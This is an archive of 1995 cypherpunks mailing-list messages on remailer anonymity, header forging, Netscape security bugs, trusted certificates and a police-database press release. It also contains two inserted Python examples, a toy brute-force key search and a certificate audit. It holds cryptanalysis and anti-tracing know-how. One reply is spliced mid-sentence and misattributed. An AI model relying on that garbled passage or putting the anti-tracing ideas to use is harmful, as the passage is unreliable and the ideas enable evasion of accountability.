Given security thru obscurity, who knows?

> > Even if the graphics format is compressed, leading to a more 
> > even distribution, ...

That cannot be so: once it is compressed, you can't encrypt it as a
picture, you have to encrypt it as a bitstream.

...
> You could also try throwing an edge detector or some other morphological
> recognizer at the output. It would still be cheaper than having to a man
> in the loop, but you're going to spend a lot of cpu time.

Much easier than OCR.


Going back to compressing images now... HINT anyone?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----
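
The criterion in the message above (pick the key that minimises I(key) + I(ciphertext decrypted-by key)), as an added example that is not part of the original message. The cipher (a SHA-256 counter keystream with a 12-bit key), the sample picture and every name below are constructed for illustration; the scheme discussed in the thread is not known.

```python
import hashlib
import random
import zlib

KEY_BITS = 12          # toy key space (4096 keys) so the exhaustive search is quick
SECRET_KEY = 0x5A7     # constructed key used to make the sample ciphertexts
WIDTH, HEIGHT = 32, 32


def keystream(key: int, n: int) -> bytes:
    """Constructed toy cipher: SHA-256 over (key, counter) used as a keystream."""
    out = bytearray()
    counter = 0
    while len(out) < n:
        block = key.to_bytes(2, "big") + counter.to_bytes(4, "big")
        out += hashlib.sha256(block).digest()
        counter += 1
    return bytes(out[:n])


def crypt(key: int, data: bytes) -> bytes:
    """XOR data with the keystream; the same call encrypts and decrypts."""
    ks = keystream(key, len(data))
    mixed = int.from_bytes(data, "big") ^ int.from_bytes(ks, "big")
    return mixed.to_bytes(len(data), "big")


def sample_image() -> bytes:
    """Constructed 8-bit greyscale picture: pixel values cover almost the
    whole 0..255 range, yet each pixel is close to its left neighbour."""
    rng = random.Random(1995)
    return bytes((3 * x + 5 * y + rng.randint(-2, 2)) & 0xFF
                 for y in range(HEIGHT) for x in range(WIDTH))


def sub_filter(data: bytes) -> bytes:
    """Replace each byte by its difference from the previous byte, which
    exposes neighbour correlation to a general-purpose compressor."""
    return bytes((cur - prev) & 0xFF for prev, cur in zip(b"\x00" + data, data))


def information(candidate: bytes) -> int:
    """Estimate of I(candidate) in bytes: size after sub_filter + deflate.
    All keys have the same length, so I(key) is a constant and is left out."""
    return len(zlib.compress(sub_filter(candidate), 9))


def pack(image: bytes) -> bytes:
    """Losslessly compressed form of the picture (a bitstream, not pixels)."""
    return zlib.compress(sub_filter(image), 9)


def recover_key(ciphertext: bytes):
    """Try every key; return (best key, gap in bytes to the runner-up score)."""
    scored = sorted((information(crypt(k, ciphertext)), k)
                    for k in range(1 << KEY_BITS))
    (best, key), (second, _) = scored[0], scored[1]
    return key, second - best


if __name__ == "__main__":
    image = sample_image()
    # Raw pixels: only the right key yields a compressible candidate.
    print("raw picture:    key=%#x gap=%d bytes"
          % recover_key(crypt(SECRET_KEY, image)))
    # Compressed first: every candidate, right or wrong, is incompressible,
    # so this score no longer separates the keys and a different recogniser
    # (for instance, whether the candidate inflates cleanly) would be needed.
    print("packed picture: key=%#x gap=%d bytes"
          % recover_key(crypt(SECRET_KEY, pack(image))))
```
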



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Wed, 18 Oct 95 11:19:42 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510181636.JAA17879@jobe.shell.portal.com>
Message-ID: <9510181819.AA09097@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal said:
> I think splitting the message would be OK, but then the question is who
> is responsible for reassembling it?  If there were a "reassembly
> server" which took such messages, assembled them, and forwarded them,
> then we would be right back where we started from.  If the end user is
> responsible for reassembly, then that is tantamount to voluntarily
> agreeing to receive anonymous messages, and that is no problem.

I was thinking that the recipient would be responsible -- otherwise,
there's not much point.  Yes, this is particularly awkward for news.
Also, the sender would probably have to do the splitting, to avoid
presenting any remailer with the whole message.

Is there really "no problem" if the recipient does the merging?  If
Child Terrorist A is communicating with Child Terrorist B, law
enforcement is going to be unhappy.  I imagine you don't get too many
complaints about that, but it's part of the political argument against
remailers.  

--
   Eli Brandt
   eli+@cs.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 18 Oct 95 11:27:05 PDT
To: cypherpunks@toad.com
Subject: This PROMISes to be odius
Message-ID: <Pine.SOL.3.91.951018141754.20570A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain



PR   10/18 0809  ORACLE INTRODUCES SOFTWARE TOOL FOR LAW ENFORCEMENT 

Tool Helps Federal, State, Municipal Agencies Stop the Criminal Element

      Enables Agencies and Departments To Build Data Warehouses of
         Intelligence To Better Manage, Analyze and Solve Cases

    MIAMI, Oct. 18 /PRNewswire/ -- Oracle Corp. (Nasdaq: ORCL), the world's
leading information management software company, today announced immediate
availability of Oracle Special Investigative Unit Support System (SIUSS)
Release 1.0, a Microsoft Windows-based software tool designed to help law
enforcement investigators more effectively manage and solve cases.  Oracle
SIUSS uses Oracle's industry leading information management technology to yield
new insights into criminal activity and significantly reduce the time needed to
bring cases to their successful resolution.  The software was introduced at the
International Association of Chiefs of Police Conference in Miami, FL.
    
     Oracle SIUSS represents a major step forward in the collection, storage
and analysis of case intelligence information for complex conspiracies, violent
crimes such as rape and murder, drug trafficking, and other major cases.

     The tool combines traditional analytical concepts with job-specific
information collection and lead generation analysis features.  For example,
Oracle SIUSS receives input from various investigative sources -- a
surveillance team, forensics expert, wire room operator, citizen tip -- and
makes the data available to agency management, analysts and investigators in
the form of leads on their cases.

     Oracle SIUSS offers advanced capabilities beyond traditional law
enforcement systems which simply gather and store factual information such as
name, birthdate, or time of a call.  Oracle SIUSS develops leads the way a real
investigator works, by starting with known facts and combining them in a way
that generates further insight and leads.

     Built upon Oracle7, the most popular relational database management system
in use by U.S. law enforcement personnel, Oracle SIUSS allows investigators to
uncover crucial criminal patterns by linking subjects, vehicles, locations,
businesses and other entities, within a case or among several cases.  Designed
in cooperation with federal, state, military and municipal investigators
working on real cases, Oracle SIUSS manages a comprehensive array of
investigative intelligence, including telephone information (toll, pen/DNR,
Title III), assets, financial data, arrests, seizures, credit card data,
surveillance, mail covers, trash pickup, and incidents.  Because Oracle SIUSS
is able to store information from multiple cases in a single database,
information can be cross referenced to uncover obscure relationships.  Oracle
SIUSS also helps the investigator build and document case information as it
moves towards prosecution.

     "Oracle has a long history of partnership with law enforcement," said Jay
Nussbaum, senior vice president and general manager, Oracle Government. 
"Oracle software is the foundation of important programs within the FBI, INS,
Department of Justice, Customs, ATF, New Mexico Dept. of Public Safety, and
many other agencies at the federal, state, and local level.  We are proud to
introduce Oracle SIUSS to the law enforcement community, a tool designed with a
specific capability in mind -- stopping the criminal element."

    Capturing Data to Capture Criminals
    
    With Oracle SIUSS, Oracle for the first time delivers a commercial-
off-the-shelf software tool that layers the features and functionality
investigators require on top of industry-standard information management
technology.  The Oracle7 architecture provides a secure, flexible, easy-to-use
and administer environment in which law enforcement systems, including Oracle
SIUSS, can be incorporated.  Case information can be shared or kept separate to
any degree desired depending on the needs of the investigators.
    
     Through the course of an investigation, information shows up in hundreds
of bits and pieces at different times and places.  With Oracle SIUSS, once this
data is captured, the odds that it will be lost or overlooked are significantly
reduced.  Using Oracle SIUSS's automated link analysis, the time it takes to
generate and chase down leads is reduced by 20 to 100 percent.
   
     The law enforcement community as a whole benefits by this combination of
functionality and information management technology. Large agencies and small
departments alike can standardize on one underlying architecture for all of
their information processing needs. Concerns such as connectivity, security,
and portability, are now non-issues.  The net result is a significantly
enhanced investigative capability integrated into the overall law enforcement
operation.

     Oracle SIUSS uses a sophisticated pattern analysis process for analyzing
the timing and sequence of phone calls made by the target. This gives insight
into how the target and his associates work together within a possible
conspiracy.  For example, Oracle SIUSS generates a conspiracy index based upon
the relationship of calls made by the target to a set of phone numbers, which
reveals the degree of probability that the subscriber for a phone number is
involved in the conspiracy.

     Joint investigative operations between agencies or departments are
possible, if authorized, ensuring a high degree of control over what
information is available to which individual, department, or agency. Oracle's
secure database, networking, and encryption technologies control the flow and
accessibility of intelligence data outside the supplying agency.
     
     A typical Oracle SIUSS configuration consists of Windows PCs connected to
virtually any type of file server.  The price starts at $6,900, which includes
the Oracle7 database.  For more information about Oracle SIUSS, please call
(301) 633-0584, Ext. 7192.

     Oracle Corp., a $3 billion company, is the world's largest supplier of
software for information management, and the world's second largest software
company.  The company offers its database, tools and application products along
with related consulting, education and support services, in more than 90
countries around the world.

     For more information about Oracle, please call (415) 506-4000. Oracle's
World Wide Web address is http://www.oracle.com/.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 18 Oct 95 11:31:30 PDT
To: cypherpunks@toad.com
Subject: Oh to be a mouse in the corner...
Message-ID: <Pine.SOL.3.91.951018142342.20665B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


PR   10/17 1720  ABA: TERRORISM EXPERTS TO SPEAK

    Why is domestic terrorism on the increase?  How serious a problem is it? 
Do we have international terrorism under control?  These and other questions
will be the focus of a two-day conference sponsored by the ABA Standing
Committee on Law and National Security at the Hotel Washington in Washington
D.C., October 19 and 20.
    The conference, entitled "National Security Law in a Changing World: The
Fifth Annual Review of the Field," features experts in the field of terrorism,
including former CIA Director William Colby, former FBI Director William
Sessions, and Oklahoma Governor Frank Keating, whose state was the site of the
worst domestic terrorist attack in U.S. history.

    Program highlights include:

    "The Press and National Security," 10:30 a.m. Thurs., Oct. 19

    Panelists:  Timothy Weiner, New York Times; Peter Rodman, National
     Review; Carl Robert Zelnick, ABC-TV; and Carl Stern, Department of
     Justice.


    "Reinventing the Intelligence Community," 2 p.m., Thurs., Oct. 19

    Panelists:  William Colby, Former Director of the Central
    Intelligence Agency; William Sessions, Former Director of the
    Federal Bureau of Investigation; and Admiral William Studeman,
    Former Acting Director of CIA.

    "Addressing the Threat of Domestic Terrorism," 8:30 a.m., Fri.,
    Oct. 20

     Panelists: Bradley Buckles, Bureau of Alcohol, Tobacco and
     Firearms; Howard Shapiro, General Counsel FBI; and Professor
     Stephen Sloan, University of Oklahoma.

    Luncheon Address, 12 p.m., Fri., October 20

    Speaker: The Honorable Frank Keating, Governor of Oklahoma

    All Conference events will take place in the Ballroom, Lower Lobby Level at
The Hotel Washington, 15th St. and Pennsylvania Ave., Washington D.C. For a
complete listing of conference programs, please call Holly McMahon at
202-662-1036.

    CONTACT:  Christine Lanier of the American Bar Association, 202-662-1792,
or
E-Mail:  clanier@@attmail.com.
    -0-                 10/17/95




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Wed, 18 Oct 95 14:28:53 PDT
To: cypherpunks@toad.com
Subject: perl-RSA CJ request sent today
Message-ID: <199510182128.OAA00218@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


A number of people have been asking me whether I've gotten any
response from the CJR yet. Well, I only sent it off today, because
I've been so busy.

I sent the main one priority mail, so I suppose the clock can be
considered to have started ticking on the 20th, just in case anybody
is keeping track.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 18 Oct 95 13:20:05 PDT
To: cypherpunks@toad.com
Subject: Media Accuracy
Message-ID: <9509188140.AA814053942@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     In the October 16, 1995 issue of PC Week, Spencer F. Katt writes:
     
     >Isn't it ironic?  Andreessen creates the WEB while in college; now 
     >college students are finding all the holes in it.  Two students have 
     >uncovered a serious bug in Netscape Navigator, one Katt source 
     >contends.  The browser has a 2K-byte buffer for reading HTML 
     >documents.  Well, these tipsters found that once the page has sent 
     >more than 2K, any assembly code in the HTML document will be 
     >executed.  As an experiment, these kids set up a simple Web server 
     >with some assembly code embedded in the HTML page to overwrite the 
     >client computer's FAT table [sic].  Sure enough, it worked.
     
     >spencer@pcweek.ziff.com
     
     He might be talking about the (already fixed) bug that allowed an HREF 
     that is longer than 356 bytes to overwrite the stack.  Hadn't heard 
     here that anything would happen other than getting Netscape to crash.  
     No names or URL's were given in the story.  Maybe he needs an update.
     Maybe we need an update.
     
     Martin G. Diehl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 18 Oct 95 11:47:26 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <v02120d00acaabce496b3@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:42 AM 10/18/95, Hal wrote:

>I think a remailer which forged headers would get people even angrier
>than one which was up front about what it was doing.  Forging headers is
>really considered antisocial by a lot of people on the net.  If you could
>do it safely, you wouldn't need remailers.  Since you need them, it's not
>safe, hence the message will probably get traced back to the remailer.
>This is prima facie evidence to get an account yanked at a lot of places.

        Of course. The problem is that protocols as implemented permit
header-forging: it's a practical fact of the net, and one that maybe
shouldn't be overlooked on (basically vague) 'moral' grounds, any more than
Netscape should say, "Well, you just _shouldn't_ screw someone with a
foo.foo.foo.foo... URL." Of course people shouldn't overflow your stack
intentionally--but they _can_, and the implications of that fact are
shaping the net as we speak. If the headers were forged in such a way as to
falsely and _credibly_ attribute a transmission to an actual uninvolved
third-party, that's one thing; but the existence of headers that are forged
so incompetently as to be traceable to their actual origin suggests that
forged headers might be worth meditating on. For example, what if two or
three dozen independently maintained Mixmasters in three or four countries
randomly forged headers (maybe even actually badly, or maybe craftily
"badly") so as to make the last link in a chain look like one (or "one") of
the other remailers; how would the Co$ cope with that?
        Anyway, you get the drift.


Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Marner <dmarner@mis.nu.edu>
Date: Wed, 18 Oct 95 14:51:43 PDT
To: anonymous-remailer@shell.portal.com
Subject: [NOISE] Re: Netscape rewards are an insult
In-Reply-To: <199510181839.LAA07648@jobe.shell.portal.com>
Message-ID: <199510182151.VAA05589@mis.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 18 Oct 1995 11:39:49 -0700  some Anonymized cretin wrote:

>Mr. Weinstein:
>
>Is your comment about the "Bugs Bounty" program an official comment, that
>you have "no idea how valuable" it will be??  Shall I give you a clue,
>as to how valuable the discovery of a flawed algorithm might be??
>

... and so on ...

Alice, 
   Could you please flag your messages with "[POINTLESS WORDY OFF-TOPIC FLAME]"
in the subject line from now on? Since you are going through a
remailer, I can't otherwise killfile you. 

   Alternatively, there seems to be growing support for the "[NOISE]"
standard, you could at least do us all the service of including that. 

   Many thanks.

--
Dan Marner                             dmarner@mis.nu.edu
Network Weasel                         http://mis.nu.edu/~dmarner
National University                    "Not on MY network!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 17 Oct 95 22:49:36 PDT
To: cypherpunks@toad.com
Subject: A comment about Netscape 2 and certifictes
In-Reply-To: <199510180307.XAA23559@book.hks.net>
Message-ID: <Pine.SOL.3.91.951018141041.27804D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Just some more noise about netscape 2,

I have been playing around with netscape 2b1 and have extracted the 
certificates it trusts from the cert.db file.  (The file is a Berkeley DB 
file and the certificates have a 7 byte prefix and a trailing printable 
string).  They are as follows

/C=US/O=AT&T/OU=Certification Authority
/C=US/O=AT&T Bell Laboratories/OU=Prototype Research CA
/C=US/SP=California/O=CommerceNet/OU=Server Certification Authority
/C=US/O=MCI/OU=internetMCI/OU=MALL
/C=US/OU=Test CA/O=Netscape Communications Corp.
/C=US/O=RSA Data Security, Inc./OU=Commercial Certification Authority
/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority

The one unusual thing is that the CA for /OU=internetMCI/OU=MALL is missing
	subject=/C=US/O=MCI/OU=internetMCI/OU=MALL
	issuer= /C=US/O=MCI/OU=internetMCI/OU=PCA  <<<<<<<
(the CommerceNet is signed by one of the RSA certificates)

The CommerceNet certificate is only using a 678 bit RSA modulus, the other 
certificates are either 1000 or 1024 bits long.

If anyone wants the certificates I can send them.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)
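
The two observations in the message above (an issuer that is absent from the trusted set, and a short RSA modulus), written as a trust-store check. This is an added example, not part of the original message and not Netscape's code; the subject names and the 678-bit figure are copied from the message, while the function names and the 1000-bit threshold (taken from the remark that the other certificates are 1000 or 1024 bits) are assumptions.

```python
from typing import Dict, List, Tuple

DN = Tuple[Tuple[str, str], ...]

# Subjects of the trusted certificates, copied from the message above.
TRUSTED = """\
/C=US/O=AT&T/OU=Certification Authority
/C=US/O=AT&T Bell Laboratories/OU=Prototype Research CA
/C=US/SP=California/O=CommerceNet/OU=Server Certification Authority
/C=US/O=MCI/OU=internetMCI/OU=MALL
/C=US/OU=Test CA/O=Netscape Communications Corp.
/C=US/O=RSA Data Security, Inc./OU=Commercial Certification Authority
/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority
"""

# Only what the message states explicitly; nothing else is filled in.
STATED_ISSUERS = [("subject=/C=US/O=MCI/OU=internetMCI/OU=MALL",
                   "issuer= /C=US/O=MCI/OU=internetMCI/OU=PCA")]
STATED_MODULUS_BITS = {
    "/C=US/SP=California/O=CommerceNet/OU=Server Certification Authority": 678,
}
MIN_MODULUS_BITS = 1000  # assumption: the smallest size the message reports for the rest


def parse_dn(text: str) -> DN:
    """Parse a one-line '/K=V/K=V' name, keeping RDN order and repeated keys."""
    text = text.strip()
    for prefix in ("subject=", "issuer="):
        if text.startswith(prefix):
            text = text[len(prefix):].strip()
    if not text.startswith("/"):
        raise ValueError("not a one-line distinguished name: %r" % text)
    rdns: List[Tuple[str, str]] = []
    for part in text[1:].split("/"):
        key, sep, value = part.partition("=")
        if sep:
            rdns.append((key.strip().upper(), value.strip()))
        elif rdns:                      # a '/' that belonged to the previous value
            prev_key, prev_value = rdns[-1]
            rdns[-1] = (prev_key, prev_value + "/" + part)
        else:
            raise ValueError("component without '=': %r" % part)
    return tuple(rdns)


def format_dn(dn: DN) -> str:
    return "".join("/%s=%s" % (key, value) for key, value in dn)


def audit(trusted: str, issuers, modulus_bits: Dict[str, int],
          min_bits: int = MIN_MODULUS_BITS) -> List[Tuple[str, str, str]]:
    """Return (kind, subject, detail) findings for the trust store."""
    store = {parse_dn(line) for line in trusted.splitlines() if line.strip()}
    findings = []
    for subject_text, issuer_text in issuers:
        subject, issuer = parse_dn(subject_text), parse_dn(issuer_text)
        # A certificate that is not self-issued needs its issuer in the store,
        # otherwise no chain can be built for it from the trusted set alone.
        if subject in store and issuer != subject and issuer not in store:
            findings.append(("missing-issuer", format_dn(subject), format_dn(issuer)))
    for subject_text, bits in modulus_bits.items():
        subject = parse_dn(subject_text)
        if subject in store and bits < min_bits:
            findings.append(("short-modulus", format_dn(subject), "%d bits" % bits))
    return findings


if __name__ == "__main__":
    for kind, subject, detail in audit(TRUSTED, STATED_ISSUERS, STATED_MODULUS_BITS):
        print("%-15s %s -> %s" % (kind, subject, detail))
```
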





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 18 Oct 95 12:31:22 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Brief Rant (Re: Oh to be a mouse in the corner...)
In-Reply-To: <Pine.SOL.3.91.951018142342.20665B-100000@use.usit.net>
Message-ID: <199510181931.PAA05857@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan forwards:
> PR   10/17 1720  ABA: TERRORISM EXPERTS TO SPEAK
> 
>     Why is domestic terrorism on the increase?  How serious a problem is it? 

Not to worry, we'll just outlaw all unlicensed cryptography. After all, it
works in France. You don't see weekly terrorist attacks over there any more,
now do you ?

This Horseman has no horse.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 18 Oct 95 12:36:37 PDT
To: cypherpunks@toad.com
Subject: (buyinfo Req:) Stored value card alliances?
Message-ID: <v02120d00acab05139451@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Wed, 18 Oct 95 09:03:00 -0400
From: Mark <mark@bmainc.com>
Sender: Mark <mark@bmainc.com>
Organization: Bruce Morgan Associates, Inc.
To: www-buyinfo@allegra.att.com
Subject: <None>

Would someone be able to recommend a table listing all the various stored-value
card and digital cash strategic alliances?

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 18 Oct 95 13:16:37 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Brief Rant (Re: Oh to be a mouse in the corner...)
In-Reply-To: <199510181931.PAA05857@opine.cs.umass.edu>
Message-ID: <199510181958.PAA06747@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> Not to worry, we'll just outlaw all unlicensed cryptography. After all, it
> works in France. You don't see weekly terrorist attacks over there any more,
> now do you ?

This is a critical point to make with the press.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 13:01:41 PDT
To: Doug Cutrell <doug@cdsnet.net>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <v02120d24acaaefb40aa5@[204.118.244.112]>
Message-ID: <Pine.3.89.9510181510.B98930-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, Doug Cutrell wrote:

> It seems that there could at least be a hierarchy of shadowed newsgroups,
> e.g. alt.freespeech.*,  requiring the enduser to use special software to
> reassemble actual postings.  This could even be integrated into the
> newsreaders, or even at a local newserver level.

There already is. I think the *.test (or at least alt.test) groups have 
good propagation. Nobody "reads" anything but their own posts anyway, so 
the natives wouldn't be bothered. 

There are some "real" (as opposed to usenet posting tests) *.test 
newsgroups, so you'd have to be careful about which ones you post to.

ire hierarchy for this sort of thing widely
propagated. Last year I was a prolific contributor to alt.config. At one 
point someone on c'punks mentioned problems in getting alt.anonymous and
alt.anonymous.messages. I hoped my good reputation in alt.config (at that
time, anyway ;) might help my call for a round of re-newgrouping to increase
the groups' propagation. But I found that I couldn't convincingly justify
their existence against the objections raised by news admins. 

Let me summarize the arguments I've seen against alt.anonymous.*:

1) It's a hopeless mess for readers, because messages on all imaginable 
topics will be jumbled together there. Messages there won't fit conveniently
into the flow of threads in other newsgroups. So anonymous messages intended
for general consumption will be pointless in alt.anonymous.*

2) In light of 1), people won't look there unless they expect a personal 
message from someone. So most of the traffic there will be irrelevant to 
nearly everyone on Usenet. 

3) If it has sufficiently low bandwidth for news admins to overlook 2), it 
should be a mailing list.

The fundamental conflict, as I see it, is this: 
For security reasons, we want messages to be distributed to a very wide
audience, although those messages are only of interest to a very narrow
audience. News admins understandably are generally inclined to accept
bandwidth only in proportion to readership. For practical reasons, they don't
want to carry messages to people who aren't interested in them. It's not
easy to convince the news admins to do it anyway out of altruism.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 18 Oct 95 16:06:49 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <199510182301.QAA23898@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-plonk-
> 
> 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 13:15:23 PDT
To: t byfield <tbyfield@panix.com>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <v02120d00acaabce496b3@DialupEudora>
Message-ID: <Pine.3.89.9510181641.A97019-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, t byfield wrote:

> At 9:42 AM 10/18/95, Hal wrote:
> 
>         Of course. The problem is that protocols as implemented permit
> header-forging: it's a practical fact of the net, and one that maybe
> shouldn't be overlooked on (basically vague) 'moral' grounds, any more than

The courts can't overlook it either. There goes liability. If I posted 
pirated software from this account, according to what you're saying, I could 
claim a forgery and show reasonable doubt.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Wed, 18 Oct 95 16:28:58 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <199510182319.QAA02924@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or
> other) browser:
>
> Concept 1 - Hot Java code that, once started, takes and retains
> control of the viewer.  It includes hot buttons, etc.  that let you
> use common resources on the net, store favorite places, etc.  When
> you push any button in this window, it simulates Hot Java within its
> own code, but all reads and writes contain code to restart the
> program (such as the "remember favorite places" button, etc.).

You are obviously disillusioned/ignorant about how the java runtime
environment works, and what is possible with its base class
libraries. I'll bet that you have never ever read the programming
guide or the virtual machine specs, and I encourage you to do so
before you embarrass yourself even more.

Christopher

P.S. Coming Soon! 50 things that could happen to flying pigs!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 18 Oct 95 13:28:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [NOISE] Re: Netscape rewards are an insult
In-Reply-To: <199510181839.LAA07648@jobe.shell.portal.com>
Message-ID: <199510182028.QAA06098@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


someone claiming to be Alice de `nonymous writes:
> Is your comment about the "Bugs Bounty" program an official comment, that
> you have "no idea how valuable" it will be??  Shall I give you a clue,
> as to how valuable the discovery of a flawed algorithm might be??

Whoa there !  You've just made a huge conceptual leap, from "value of the
Bugs Bounty program" to "value of the discovery of a security flaw". I think
nearly everyone agrees that the latter is significant. There appears to be
great disagreement about the former, as Alice de `nonymous has demonstrated.

[...]
> after
> posting the exploitation algorithm last week -- on Friday the Thirteenth --
> there has been nothing but public relations huff-and-puff.

There's been a specific response to your claim, which so far you have ignored.
It would seem that you are far more interested in impugning Netscape's motives
than discussing the security issue you raised.

[...]
> I wonder ... are you paying them in shirts or migs, for their white-wash
> review??  

Ooh, I like this idea. Find a flaw, get a MiG-29 ! Of course, we knew that
Netscape Communications Corp. must be a KGB front. The Commies are still 
hoping to undermine U.S. national security. Did you notice that we heard
about the White House browsing Web pages right about the same time that
KKlinton relaxed the supercomputer export controls ?  Adding insult to
injury, they want to foist surplus Soviet goods off on us....

<chortle>

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 18 Oct 95 13:40:28 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510181641.A97019-0100000@aix2.uottawa.ca>
Message-ID: <9510181639.ZM2489@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


On Oct 18,  4:15pm, s1018954@aix2.uottawa.ca wrote:
> If I posted
> pirated software from this account, according to what you're saying, I could
> claim a forgery and show reasonable doubt.

Without an author-certification mechanism in place, you can always
claim forgery. In this case, to show reasonable doubt you would probably
have to prove that some one else would have a motive for forging it in
the first place.

This is one place where importance of digital signatures can be very
strong. *If* we were all wonderful little cypher-junkies and signed
everything, then we might plausibly be able to deny forged mail: "I
sign everything I ever send, it's hardcoded into my mailer, that
didn't come from me..."

As it is, in most cases we run on trust, except where we're deliberately
trying to make certain that matters are not modified or we're trying to
make things a matter of record. [Checksums of binaries, for example,
or press releases on controversial topics.]

I'm looking forward to the point where my mail reader will sort things
according to reputations I give correspondents, and perhaps flag mail
which deviates from the norm for each correspondent. [e.g., if Tim May
signs something, it's probably pretty severe. If a pgp-fanatic doesn't,
something might be up...]

I'm also looking forward to the point where I can be on a mailing list
where folks look at the first line of my .sig and say, "this is being
written by an individual" and I don't have to worry about them thinking
I speak for organisations. [Which one would I be speaking for? Shad
Valley 1992?]

richard

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 18 Oct 95 14:06:46 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510181440.A93842-0100000@aix2.uottawa.ca>
